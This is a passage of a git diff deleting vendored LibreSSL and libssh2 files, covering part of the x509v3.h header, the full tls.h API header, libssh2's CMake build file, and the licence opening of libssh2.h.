-int X509V3_get_value_bool(CONF_VALUE *value, int *asn1_bool);
-int X509V3_get_value_int(CONF_VALUE *value, ASN1_INTEGER **aint);
-void X509V3_set_nconf(X509V3_CTX *ctx, CONF *conf);
-void X509V3_set_conf_lhash(X509V3_CTX *ctx, LHASH_OF(CONF_VALUE) *lhash);
-#endif
-
-char * X509V3_get_string(X509V3_CTX *ctx, char *name, char *section);
-STACK_OF(CONF_VALUE) * X509V3_get_section(X509V3_CTX *ctx, char *section);
-void X509V3_string_free(X509V3_CTX *ctx, char *str);
-void X509V3_section_free( X509V3_CTX *ctx, STACK_OF(CONF_VALUE) *section);
-void X509V3_set_ctx(X509V3_CTX *ctx, X509 *issuer, X509 *subject,
-				 X509_REQ *req, X509_CRL *crl, int flags);
-
-int X509V3_add_value(const char *name, const char *value,
-						STACK_OF(CONF_VALUE) **extlist);
-int X509V3_add_value_uchar(const char *name, const unsigned char *value,
-						STACK_OF(CONF_VALUE) **extlist);
-int X509V3_add_value_bool(const char *name, int asn1_bool,
-						STACK_OF(CONF_VALUE) **extlist);
-int X509V3_add_value_int(const char *name, ASN1_INTEGER *aint,
-						STACK_OF(CONF_VALUE) **extlist);
-char * i2s_ASN1_INTEGER(X509V3_EXT_METHOD *meth, ASN1_INTEGER *aint);
-ASN1_INTEGER * s2i_ASN1_INTEGER(X509V3_EXT_METHOD *meth, char *value);
-char * i2s_ASN1_ENUMERATED(X509V3_EXT_METHOD *meth, ASN1_ENUMERATED *aint);
-char * i2s_ASN1_ENUMERATED_TABLE(X509V3_EXT_METHOD *meth, ASN1_ENUMERATED *aint);
-int X509V3_EXT_add(X509V3_EXT_METHOD *ext);
-int X509V3_EXT_add_list(X509V3_EXT_METHOD *extlist);
-int X509V3_EXT_add_alias(int nid_to, int nid_from);
-void X509V3_EXT_cleanup(void);
-
-const X509V3_EXT_METHOD *X509V3_EXT_get(X509_EXTENSION *ext);
-const X509V3_EXT_METHOD *X509V3_EXT_get_nid(int nid);
-int X509V3_add_standard_extensions(void);
-STACK_OF(CONF_VALUE) *X509V3_parse_list(const char *line);
-void *X509V3_EXT_d2i(X509_EXTENSION *ext);
-void *X509V3_get_d2i(STACK_OF(X509_EXTENSION) *x, int nid, int *crit, int *idx);
-
-
-X509_EXTENSION *X509V3_EXT_i2d(int ext_nid, int crit, void *ext_struc);
-int X509V3_add1_i2d(STACK_OF(X509_EXTENSION) **x, int nid, void *value, int crit, unsigned long flags);
-
-char *hex_to_string(const unsigned char *buffer, long len);
-unsigned char *string_to_hex(const char *str, long *len);
-int name_cmp(const char *name, const char *cmp);
-
-void X509V3_EXT_val_prn(BIO *out, STACK_OF(CONF_VALUE) *val, int indent,
-								 int ml);
-int X509V3_EXT_print(BIO *out, X509_EXTENSION *ext, unsigned long flag, int indent);
-int X509V3_EXT_print_fp(FILE *out, X509_EXTENSION *ext, int flag, int indent);
-
-int X509V3_extensions_print(BIO *out, char *title, STACK_OF(X509_EXTENSION) *exts, unsigned long flag, int indent);
-
-int X509_check_ca(X509 *x);
-int X509_check_purpose(X509 *x, int id, int ca);
-int X509_supported_extension(X509_EXTENSION *ex);
-int X509_PURPOSE_set(int *p, int purpose);
-int X509_check_issued(X509 *issuer, X509 *subject);
-int X509_check_akid(X509 *issuer, AUTHORITY_KEYID *akid);
-int X509_PURPOSE_get_count(void);
-X509_PURPOSE * X509_PURPOSE_get0(int idx);
-int X509_PURPOSE_get_by_sname(char *sname);
-int X509_PURPOSE_get_by_id(int id);
-int X509_PURPOSE_add(int id, int trust, int flags,
-			int (*ck)(const X509_PURPOSE *, const X509 *, int),
-				char *name, char *sname, void *arg);
-char *X509_PURPOSE_get0_name(X509_PURPOSE *xp);
-char *X509_PURPOSE_get0_sname(X509_PURPOSE *xp);
-int X509_PURPOSE_get_trust(X509_PURPOSE *xp);
-void X509_PURPOSE_cleanup(void);
-int X509_PURPOSE_get_id(X509_PURPOSE *);
-
-STACK_OF(OPENSSL_STRING) *X509_get1_email(X509 *x);
-STACK_OF(OPENSSL_STRING) *X509_REQ_get1_email(X509_REQ *x);
-void X509_email_free(STACK_OF(OPENSSL_STRING) *sk);
-STACK_OF(OPENSSL_STRING) *X509_get1_ocsp(X509 *x);
-
-/* Flags for X509_check_* functions */
-/* Always check subject name for host match even if subject alt names present */
-#define X509_CHECK_FLAG_ALWAYS_CHECK_SUBJECT	0x1
-/* Disable wildcard matching for dnsName fields and common name. */
-#define X509_CHECK_FLAG_NO_WILDCARDS	0x2
-/* Wildcards must not match a partial label. */
-#define X509_CHECK_FLAG_NO_PARTIAL_WILDCARDS 0x4
-/* Allow (non-partial) wildcards to match multiple labels. */
-#define X509_CHECK_FLAG_MULTI_LABEL_WILDCARDS 0x8
-/* Constraint verifier subdomain patterns to match a single labels. */
-#define X509_CHECK_FLAG_SINGLE_LABEL_SUBDOMAINS 0x10
-
-/*
- * Match reference identifiers starting with "." to any sub-domain.
- * This is a non-public flag, turned on implicitly when the subject
- * reference identity is a DNS name.
- */
-#define _X509_CHECK_FLAG_DOT_SUBDOMAINS 0x8000
-
-int X509_check_host(X509 *x, const char *chk, size_t chklen,
-    unsigned int flags, char **peername);
-int X509_check_email(X509 *x, const char *chk, size_t chklen,
-    unsigned int flags);
-int X509_check_ip(X509 *x, const unsigned char *chk, size_t chklen,
-    unsigned int flags);
-int X509_check_ip_asc(X509 *x, const char *ipasc, unsigned int flags);
-
-ASN1_OCTET_STRING *a2i_IPADDRESS(const char *ipasc);
-ASN1_OCTET_STRING *a2i_IPADDRESS_NC(const char *ipasc);
-int a2i_ipadd(unsigned char *ipout, const char *ipasc);
-int X509V3_NAME_from_section(X509_NAME *nm, STACK_OF(CONF_VALUE)*dn_sk,
-						unsigned long chtype);
-
-void X509_POLICY_NODE_print(BIO *out, X509_POLICY_NODE *node, int indent);
-DECLARE_STACK_OF(X509_POLICY_NODE)
-
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_X509V3_strings(void);
-
-/* Error codes for the X509V3 functions. */
-
-/* Function codes. */
-#define X509V3_F_A2I_GENERAL_NAME			 164
-#define X509V3_F_ASIDENTIFIERCHOICE_CANONIZE		 161
-#define X509V3_F_ASIDENTIFIERCHOICE_IS_CANONICAL	 162
-#define X509V3_F_COPY_EMAIL				 122
-#define X509V3_F_COPY_ISSUER				 123
-#define X509V3_F_DO_DIRNAME				 144
-#define X509V3_F_DO_EXT_CONF				 124
-#define X509V3_F_DO_EXT_I2D				 135
-#define X509V3_F_DO_EXT_NCONF				 151
-#define X509V3_F_DO_I2V_NAME_CONSTRAINTS		 148
-#define X509V3_F_GNAMES_FROM_SECTNAME			 156
-#define X509V3_F_HEX_TO_STRING				 111
-#define X509V3_F_I2S_ASN1_ENUMERATED			 121
-#define X509V3_F_I2S_ASN1_IA5STRING			 149
-#define X509V3_F_I2S_ASN1_INTEGER			 120
-#define X509V3_F_I2V_AUTHORITY_INFO_ACCESS		 138
-#define X509V3_F_NOTICE_SECTION				 132
-#define X509V3_F_NREF_NOS				 133
-#define X509V3_F_POLICY_SECTION				 131
-#define X509V3_F_PROCESS_PCI_VALUE			 150
-#define X509V3_F_R2I_CERTPOL				 130
-#define X509V3_F_R2I_PCI				 155
-#define X509V3_F_S2I_ASN1_IA5STRING			 100
-#define X509V3_F_S2I_ASN1_INTEGER			 108
-#define X509V3_F_S2I_ASN1_OCTET_STRING			 112
-#define X509V3_F_S2I_ASN1_SKEY_ID			 114
-#define X509V3_F_S2I_SKEY_ID				 115
-#define X509V3_F_SET_DIST_POINT_NAME			 158
-#define X509V3_F_STRING_TO_HEX				 113
-#define X509V3_F_SXNET_ADD_ID_ASC			 125
-#define X509V3_F_SXNET_ADD_ID_INTEGER			 126
-#define X509V3_F_SXNET_ADD_ID_ULONG			 127
-#define X509V3_F_SXNET_GET_ID_ASC			 128
-#define X509V3_F_SXNET_GET_ID_ULONG			 129
-#define X509V3_F_V2I_ASIDENTIFIERS			 163
-#define X509V3_F_V2I_ASN1_BIT_STRING			 101
-#define X509V3_F_V2I_AUTHORITY_INFO_ACCESS		 139
-#define X509V3_F_V2I_AUTHORITY_KEYID			 119
-#define X509V3_F_V2I_BASIC_CONSTRAINTS			 102
-#define X509V3_F_V2I_CRLD				 134
-#define X509V3_F_V2I_EXTENDED_KEY_USAGE			 103
-#define X509V3_F_V2I_GENERAL_NAMES			 118
-#define X509V3_F_V2I_GENERAL_NAME_EX			 117
-#define X509V3_F_V2I_IDP				 157
-#define X509V3_F_V2I_IPADDRBLOCKS			 159
-#define X509V3_F_V2I_ISSUER_ALT				 153
-#define X509V3_F_V2I_NAME_CONSTRAINTS			 147
-#define X509V3_F_V2I_POLICY_CONSTRAINTS			 146
-#define X509V3_F_V2I_POLICY_MAPPINGS			 145
-#define X509V3_F_V2I_SUBJECT_ALT			 154
-#define X509V3_F_V3_ADDR_VALIDATE_PATH_INTERNAL		 160
-#define X509V3_F_V3_GENERIC_EXTENSION			 116
-#define X509V3_F_X509V3_ADD1_I2D			 140
-#define X509V3_F_X509V3_ADD_VALUE			 105
-#define X509V3_F_X509V3_EXT_ADD				 104
-#define X509V3_F_X509V3_EXT_ADD_ALIAS			 106
-#define X509V3_F_X509V3_EXT_CONF			 107
-#define X509V3_F_X509V3_EXT_I2D				 136
-#define X509V3_F_X509V3_EXT_NCONF			 152
-#define X509V3_F_X509V3_GET_SECTION			 142
-#define X509V3_F_X509V3_GET_STRING			 143
-#define X509V3_F_X509V3_GET_VALUE_BOOL			 110
-#define X509V3_F_X509V3_PARSE_LIST			 109
-#define X509V3_F_X509_PURPOSE_ADD			 137
-#define X509V3_F_X509_PURPOSE_SET			 141
-
-/* Reason codes. */
-#define X509V3_R_BAD_IP_ADDRESS				 118
-#define X509V3_R_BAD_OBJECT				 119
-#define X509V3_R_BN_DEC2BN_ERROR			 100
-#define X509V3_R_BN_TO_ASN1_INTEGER_ERROR		 101
-#define X509V3_R_DIRNAME_ERROR				 149
-#define X509V3_R_DISTPOINT_ALREADY_SET			 160
-#define X509V3_R_DUPLICATE_ZONE_ID			 133
-#define X509V3_R_ERROR_CONVERTING_ZONE			 131
-#define X509V3_R_ERROR_CREATING_EXTENSION		 144
-#define X509V3_R_ERROR_IN_EXTENSION			 128
-#define X509V3_R_EXPECTED_A_SECTION_NAME		 137
-#define X509V3_R_EXTENSION_EXISTS			 145
-#define X509V3_R_EXTENSION_NAME_ERROR			 115
-#define X509V3_R_EXTENSION_NOT_FOUND			 102
-#define X509V3_R_EXTENSION_SETTING_NOT_SUPPORTED	 103
-#define X509V3_R_EXTENSION_VALUE_ERROR			 116
-#define X509V3_R_ILLEGAL_EMPTY_EXTENSION		 151
-#define X509V3_R_ILLEGAL_HEX_DIGIT			 113
-#define X509V3_R_INCORRECT_POLICY_SYNTAX_TAG		 152
-#define X509V3_R_INVALID_MULTIPLE_RDNS			 161
-#define X509V3_R_INVALID_ASNUMBER			 162
-#define X509V3_R_INVALID_ASRANGE			 163
-#define X509V3_R_INVALID_BOOLEAN_STRING			 104
-#define X509V3_R_INVALID_EXTENSION_STRING		 105
-#define X509V3_R_INVALID_INHERITANCE			 165
-#define X509V3_R_INVALID_IPADDRESS			 166
-#define X509V3_R_INVALID_NAME				 106
-#define X509V3_R_INVALID_NULL_ARGUMENT			 107
-#define X509V3_R_INVALID_NULL_NAME			 108
-#define X509V3_R_INVALID_NULL_VALUE			 109
-#define X509V3_R_INVALID_NUMBER				 140
-#define X509V3_R_INVALID_NUMBERS			 141
-#define X509V3_R_INVALID_OBJECT_IDENTIFIER		 110
-#define X509V3_R_INVALID_OPTION				 138
-#define X509V3_R_INVALID_POLICY_IDENTIFIER		 134
-#define X509V3_R_INVALID_PROXY_POLICY_SETTING		 153
-#define X509V3_R_INVALID_PURPOSE			 146
-#define X509V3_R_INVALID_SAFI				 164
-#define X509V3_R_INVALID_SECTION			 135
-#define X509V3_R_INVALID_SYNTAX				 143
-#define X509V3_R_ISSUER_DECODE_ERROR			 126
-#define X509V3_R_MISSING_VALUE				 124
-#define X509V3_R_NEED_ORGANIZATION_AND_NUMBERS		 142
-#define X509V3_R_NO_CONFIG_DATABASE			 136
-#define X509V3_R_NO_ISSUER_CERTIFICATE			 121
-#define X509V3_R_NO_ISSUER_DETAILS			 127
-#define X509V3_R_NO_POLICY_IDENTIFIER			 139
-#define X509V3_R_NO_PROXY_CERT_POLICY_LANGUAGE_DEFINED	 154
-#define X509V3_R_NO_PUBLIC_KEY				 114
-#define X509V3_R_NO_SUBJECT_DETAILS			 125
-#define X509V3_R_ODD_NUMBER_OF_DIGITS			 112
-#define X509V3_R_OPERATION_NOT_DEFINED			 148
-#define X509V3_R_OTHERNAME_ERROR			 147
-#define X509V3_R_POLICY_LANGUAGE_ALREADY_DEFINED	 155
-#define X509V3_R_POLICY_PATH_LENGTH			 156
-#define X509V3_R_POLICY_PATH_LENGTH_ALREADY_DEFINED	 157
-#define X509V3_R_POLICY_SYNTAX_NOT_CURRENTLY_SUPPORTED	 158
-#define X509V3_R_POLICY_WHEN_PROXY_LANGUAGE_REQUIRES_NO_POLICY 159
-#define X509V3_R_SECTION_NOT_FOUND			 150
-#define X509V3_R_UNABLE_TO_GET_ISSUER_DETAILS		 122
-#define X509V3_R_UNABLE_TO_GET_ISSUER_KEYID		 123
-#define X509V3_R_UNKNOWN_BIT_STRING_ARGUMENT		 111
-#define X509V3_R_UNKNOWN_EXTENSION			 129
-#define X509V3_R_UNKNOWN_EXTENSION_NAME			 130
-#define X509V3_R_UNKNOWN_OPTION				 120
-#define X509V3_R_UNSUPPORTED_OPTION			 117
-#define X509V3_R_UNSUPPORTED_TYPE			 167
-#define X509V3_R_USER_TOO_LONG				 132
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/tls.h b/thirdparty/libressl/include/tls.h
deleted file mode 100644
index 3c83acd..0000000
--- a/thirdparty/libressl/include/tls.h
+++ /dev/null
@@ -1,218 +0,0 @@
-/* $OpenBSD: tls.h,v 1.51 2017/08/10 18:18:30 jsing Exp $ */
-/*
- * Copyright (c) 2014 Joel Sing <jsing@openbsd.org>
- *
- * Permission to use, copy, modify, and distribute this software for any
- * purpose with or without fee is hereby granted, provided that the above
- * copyright notice and this permission notice appear in all copies.
- *
- * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
- * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
- * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
- * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
- * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
- * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
- * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
- */
-
-#ifndef HEADER_TLS_H
-#define HEADER_TLS_H
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-#ifdef _MSC_VER
-#ifndef LIBRESSL_INTERNAL
-#include <basetsd.h>
-typedef SSIZE_T ssize_t;
-#endif
-#endif
-
-#include <sys/types.h>
-
-#include <stddef.h>
-#include <stdint.h>
-
-#define TLS_API	20170126
-
-#define TLS_PROTOCOL_TLSv1_0	(1 << 1)
-#define TLS_PROTOCOL_TLSv1_1	(1 << 2)
-#define TLS_PROTOCOL_TLSv1_2	(1 << 3)
-#define TLS_PROTOCOL_TLSv1 \
-	(TLS_PROTOCOL_TLSv1_0|TLS_PROTOCOL_TLSv1_1|TLS_PROTOCOL_TLSv1_2)
-
-#define TLS_PROTOCOLS_ALL TLS_PROTOCOL_TLSv1
-#define TLS_PROTOCOLS_DEFAULT TLS_PROTOCOL_TLSv1_2
-
-#define TLS_WANT_POLLIN		-2
-#define TLS_WANT_POLLOUT	-3
-
-/* RFC 6960 Section 2.3 */
-#define TLS_OCSP_RESPONSE_SUCCESSFUL		0
-#define TLS_OCSP_RESPONSE_MALFORMED		1
-#define TLS_OCSP_RESPONSE_INTERNALERROR		2
-#define TLS_OCSP_RESPONSE_TRYLATER		3
-#define TLS_OCSP_RESPONSE_SIGREQUIRED		4
-#define TLS_OCSP_RESPONSE_UNAUTHORIZED		5
-
-/* RFC 6960 Section 2.2 */
-#define TLS_OCSP_CERT_GOOD			0
-#define TLS_OCSP_CERT_REVOKED			1
-#define TLS_OCSP_CERT_UNKNOWN			2
-
-/* RFC 5280 Section 5.3.1 */
-#define TLS_CRL_REASON_UNSPECIFIED		0
-#define TLS_CRL_REASON_KEY_COMPROMISE		1
-#define TLS_CRL_REASON_CA_COMPROMISE		2
-#define TLS_CRL_REASON_AFFILIATION_CHANGED	3
-#define TLS_CRL_REASON_SUPERSEDED		4
-#define TLS_CRL_REASON_CESSATION_OF_OPERATION	5
-#define TLS_CRL_REASON_CERTIFICATE_HOLD		6
-#define TLS_CRL_REASON_REMOVE_FROM_CRL		8
-#define TLS_CRL_REASON_PRIVILEGE_WITHDRAWN	9
-#define TLS_CRL_REASON_AA_COMPROMISE		10
-
-#define TLS_MAX_SESSION_ID_LENGTH		32
-#define TLS_TICKET_KEY_SIZE			48
-
-struct tls;
-struct tls_config;
-
-typedef ssize_t (*tls_read_cb)(struct tls *_ctx, void *_buf, size_t _buflen,
-    void *_cb_arg);
-typedef ssize_t (*tls_write_cb)(struct tls *_ctx, const void *_buf,
-    size_t _buflen, void *_cb_arg);
-
-int tls_init(void);
-
-const char *tls_config_error(struct tls_config *_config);
-const char *tls_error(struct tls *_ctx);
-
-struct tls_config *tls_config_new(void);
-void tls_config_free(struct tls_config *_config);
-
-int tls_config_add_keypair_file(struct tls_config *_config,
-    const char *_cert_file, const char *_key_file);
-int tls_config_add_keypair_mem(struct tls_config *_config, const uint8_t *_cert,
-    size_t _cert_len, const uint8_t *_key, size_t _key_len);
-int tls_config_add_keypair_ocsp_file(struct tls_config *_config,
-    const char *_cert_file, const char *_key_file,
-    const char *_ocsp_staple_file);
-int tls_config_add_keypair_ocsp_mem(struct tls_config *_config, const uint8_t *_cert,
-    size_t _cert_len, const uint8_t *_key, size_t _key_len,
-    const uint8_t *_staple, size_t _staple_len);
-int tls_config_set_alpn(struct tls_config *_config, const char *_alpn);
-int tls_config_set_ca_file(struct tls_config *_config, const char *_ca_file);
-int tls_config_set_ca_path(struct tls_config *_config, const char *_ca_path);
-int tls_config_set_ca_mem(struct tls_config *_config, const uint8_t *_ca,
-    size_t _len);
-int tls_config_set_cert_file(struct tls_config *_config,
-    const char *_cert_file);
-int tls_config_set_cert_mem(struct tls_config *_config, const uint8_t *_cert,
-    size_t _len);
-int tls_config_set_ciphers(struct tls_config *_config, const char *_ciphers);
-int tls_config_set_crl_file(struct tls_config *_config, const char *_crl_file);
-int tls_config_set_crl_mem(struct tls_config *_config, const uint8_t *_crl,
-    size_t _len);
-int tls_config_set_dheparams(struct tls_config *_config, const char *_params);
-int tls_config_set_ecdhecurve(struct tls_config *_config, const char *_curve);
-int tls_config_set_ecdhecurves(struct tls_config *_config, const char *_curves);
-int tls_config_set_key_file(struct tls_config *_config, const char *_key_file);
-int tls_config_set_key_mem(struct tls_config *_config, const uint8_t *_key,
-    size_t _len);
-int tls_config_set_keypair_file(struct tls_config *_config,
-    const char *_cert_file, const char *_key_file);
-int tls_config_set_keypair_mem(struct tls_config *_config, const uint8_t *_cert,
-    size_t _cert_len, const uint8_t *_key, size_t _key_len);
-int tls_config_set_keypair_ocsp_file(struct tls_config *_config,
-    const char *_cert_file, const char *_key_file, const char *_staple_file);
-int tls_config_set_keypair_ocsp_mem(struct tls_config *_config, const uint8_t *_cert,
-    size_t _cert_len, const uint8_t *_key, size_t _key_len,
-    const uint8_t *_staple, size_t staple_len);
-int tls_config_set_ocsp_staple_mem(struct tls_config *_config,
-    const uint8_t *_staple, size_t _len);
-int tls_config_set_ocsp_staple_file(struct tls_config *_config,
-    const char *_staple_file);
-int tls_config_set_protocols(struct tls_config *_config, uint32_t _protocols);
-int tls_config_set_verify_depth(struct tls_config *_config, int _verify_depth);
-
-void tls_config_prefer_ciphers_client(struct tls_config *_config);
-void tls_config_prefer_ciphers_server(struct tls_config *_config);
-
-void tls_config_insecure_noverifycert(struct tls_config *_config);
-void tls_config_insecure_noverifyname(struct tls_config *_config);
-void tls_config_insecure_noverifytime(struct tls_config *_config);
-void tls_config_verify(struct tls_config *_config);
-
-void tls_config_ocsp_require_stapling(struct tls_config *_config);
-void tls_config_verify_client(struct tls_config *_config);
-void tls_config_verify_client_optional(struct tls_config *_config);
-
-void tls_config_clear_keys(struct tls_config *_config);
-int tls_config_parse_protocols(uint32_t *_protocols, const char *_protostr);
-
-int tls_config_set_session_id(struct tls_config *_config,
-    const unsigned char *_session_id, size_t _len);
-int tls_config_set_session_lifetime(struct tls_config *_config, int _lifetime);
-int tls_config_add_ticket_key(struct tls_config *_config, uint32_t _keyrev,
-    unsigned char *_key, size_t _keylen);
-
-struct tls *tls_client(void);
-struct tls *tls_server(void);
-int tls_configure(struct tls *_ctx, struct tls_config *_config);
-void tls_reset(struct tls *_ctx);
-void tls_free(struct tls *_ctx);
-
-int tls_accept_fds(struct tls *_ctx, struct tls **_cctx, int _fd_read,
-    int _fd_write);
-int tls_accept_socket(struct tls *_ctx, struct tls **_cctx, int _socket);
-int tls_accept_cbs(struct tls *_ctx, struct tls **_cctx,
-    tls_read_cb _read_cb, tls_write_cb _write_cb, void *_cb_arg);
-int tls_connect(struct tls *_ctx, const char *_host, const char *_port);
-int tls_connect_fds(struct tls *_ctx, int _fd_read, int _fd_write,
-    const char *_servername);
-int tls_connect_servername(struct tls *_ctx, const char *_host,
-    const char *_port, const char *_servername);
-int tls_connect_socket(struct tls *_ctx, int _s, const char *_servername);
-int tls_connect_cbs(struct tls *_ctx, tls_read_cb _read_cb,
-    tls_write_cb _write_cb, void *_cb_arg, const char *_servername);
-int tls_handshake(struct tls *_ctx);
-ssize_t tls_read(struct tls *_ctx, void *_buf, size_t _buflen);
-ssize_t tls_write(struct tls *_ctx, const void *_buf, size_t _buflen);
-int tls_close(struct tls *_ctx);
-
-int tls_peer_cert_provided(struct tls *_ctx);
-int tls_peer_cert_contains_name(struct tls *_ctx, const char *_name);
-
-const char *tls_peer_cert_hash(struct tls *_ctx);
-const char *tls_peer_cert_issuer(struct tls *_ctx);
-const char *tls_peer_cert_subject(struct tls *_ctx);
-time_t	tls_peer_cert_notbefore(struct tls *_ctx);
-time_t	tls_peer_cert_notafter(struct tls *_ctx);
-const uint8_t *tls_peer_cert_chain_pem(struct tls *_ctx, size_t *_len);
-
-const char *tls_conn_alpn_selected(struct tls *_ctx);
-const char *tls_conn_cipher(struct tls *_ctx);
-const char *tls_conn_servername(struct tls *_ctx);
-const char *tls_conn_version(struct tls *_ctx);
-
-uint8_t *tls_load_file(const char *_file, size_t *_len, char *_password);
-void tls_unload_file(uint8_t *_buf, size_t len);
-
-int tls_ocsp_process_response(struct tls *_ctx, const unsigned char *_response,
-    size_t _size);
-int tls_peer_ocsp_cert_status(struct tls *_ctx);
-int tls_peer_ocsp_crl_reason(struct tls *_ctx);
-time_t tls_peer_ocsp_next_update(struct tls *_ctx);
-int tls_peer_ocsp_response_status(struct tls *_ctx);
-const char *tls_peer_ocsp_result(struct tls *_ctx);
-time_t tls_peer_ocsp_revocation_time(struct tls *_ctx);
-time_t tls_peer_ocsp_this_update(struct tls *_ctx);
-const char *tls_peer_ocsp_url(struct tls *_ctx);
-
-#ifdef __cplusplus
-}
-#endif
-
-#endif /* HEADER_TLS_H */
diff --git a/thirdparty/libssh2/CMakeLists.txt b/thirdparty/libssh2/CMakeLists.txt
deleted file mode 100644
index a49d808..0000000
--- a/thirdparty/libssh2/CMakeLists.txt
+++ /dev/null
@@ -1,109 +0,0 @@
-# Copyright (c) 2014, 2015  Alexander Lamaison <alexander.lamaison@gmail.com>
-#
-# Redistribution and use in source and binary forms,
-# with or without modification, are permitted provided
-# that the following conditions are met:
-#
-#   Redistributions of source code must retain the above
-#   copyright notice, this list of conditions and the
-#   following disclaimer.
-#
-#   Redistributions in binary form must reproduce the above
-#   copyright notice, this list of conditions and the following
-#   disclaimer in the documentation and/or other materials
-#   provided with the distribution.
-#
-#   Neither the name of the copyright holder nor the names
-#   of any other contributors may be used to endorse or
-#   promote products derived from this software without
-#   specific prior written permission.
-#
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
-# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
-# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
-# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
-# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
-# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
-# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
-# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
-# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
-# OF SUCH DAMAGE.
-
-cmake_minimum_required(VERSION 2.8.11)
-
-list(APPEND CMAKE_MODULE_PATH ${CMAKE_CURRENT_SOURCE_DIR}/cmake)
-
-project(libssh2 C)
-set(PROJECT_URL "https://www.libssh2.org/")
-set(PROJECT_DESCRIPTION "The SSH library")
-
-if (CMAKE_VERSION VERSION_LESS "3.1")
-  if (CMAKE_C_COMPILER_ID STREQUAL "GNU")
-    set (CMAKE_C_FLAGS "--std=gnu90 ${CMAKE_C_FLAGS}")
-  endif()
-else()
-  set (CMAKE_C_STANDARD 90)
-endif()
-
-option(BUILD_SHARED_LIBS "Build Shared Libraries" OFF)
-
-# Parse version
-
-file(READ ${CMAKE_CURRENT_SOURCE_DIR}/include/libssh2.h _HEADER_CONTENTS)
-string(
-  REGEX REPLACE ".*#define LIBSSH2_VERSION[ \t]+\"([^\"]+)\".*" "\\1"
-  LIBSSH2_VERSION "${_HEADER_CONTENTS}")
-string(
-  REGEX REPLACE ".*#define LIBSSH2_VERSION_MAJOR[ \t]+([0-9]+).*" "\\1"
-  LIBSSH2_VERSION_MAJOR "${_HEADER_CONTENTS}")
-string(
-  REGEX REPLACE ".*#define LIBSSH2_VERSION_MINOR[ \t]+([0-9]+).*" "\\1"
-  LIBSSH2_VERSION_MINOR "${_HEADER_CONTENTS}")
-string(
-  REGEX REPLACE ".*#define LIBSSH2_VERSION_PATCH[ \t]+([0-9]+).*" "\\1"
-  LIBSSH2_VERSION_PATCH "${_HEADER_CONTENTS}")
-
-if(NOT LIBSSH2_VERSION OR
-   NOT LIBSSH2_VERSION_MAJOR MATCHES "^[0-9]+$" OR
-   NOT LIBSSH2_VERSION_MINOR MATCHES "^[0-9]+$" OR
-   NOT LIBSSH2_VERSION_PATCH MATCHES "^[0-9]+$")
-  message(
-    FATAL_ERROR
-    "Unable to parse version from"
-    "${CMAKE_CURRENT_SOURCE_DIR}/include/libssh2.h")
-endif()
-
-include(GNUInstallDirs)
-install(
-  FILES docs/AUTHORS COPYING docs/HACKING README RELEASE-NOTES NEWS
-  DESTINATION ${CMAKE_INSTALL_DOCDIR})
-
-include(max_warnings)
-include(FeatureSummary)
-
-add_subdirectory(src)
-
-option(BUILD_EXAMPLES "Build libssh2 examples" ON)
-if(BUILD_EXAMPLES)
-  add_subdirectory(example)
-endif()
-
-option(BUILD_TESTING "Build libssh2 test suite" ON)
-if(BUILD_TESTING)
-  enable_testing()
-  add_subdirectory(tests)
-endif()
-
-add_subdirectory(docs)
-
-feature_summary(WHAT ALL)
-
-set(CPACK_PACKAGE_VERSION_MAJOR ${LIBSSH2_VERSION_MAJOR})
-set(CPACK_PACKAGE_VERSION_MINOR ${LIBSSH2_VERSION_MINOR})
-set(CPACK_PACKAGE_VERSION_PATCH ${LIBSSH2_VERSION_PATCH})
-set(CPACK_PACKAGE_VERSION ${LIBSSH2_VERSION})
-include(CPack)
diff --git a/thirdparty/libssh2/include/libssh2.h b/thirdparty/libssh2/include/libssh2.h
deleted file mode 100644
index 9ef9ff1..0000000
--- a/thirdparty/libssh2/include/libssh2.h
+++ /dev/null
@@ -1,1294 +0,0 @@
-/* Copyright (c) 2004-2009, Sara Golemon <sarag@libssh2.org>
- * Copyright (c) 2009-2015 Daniel Stenberg
- * Copyright (c) 2010 Simon Josefsson <simon@josefsson.org>
- * All rights reserved.
- *
- * Redistribution and use in source and binary forms,
- * with or without modification, are permitted provided
- * that the following conditions are met:
- *
- *   Redistributions of source code must retain the above
- *   copyright notice, this list of conditions and the
- *   following disclaimer.
- *
- *   Redistributions in binary form must reproduce the above
- *   copyright notice, this list of conditions and the following
- *   disclaimer in the documentation and/or other materials
- *   provided with the distribution.
- *
- *   Neither the name of the copyright holder nor the names
- *   of any other contributors may be used to endorse or
- *   promote products derived from this software without
- *   specific prior written permission.
- *
- * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
- * CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
- * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
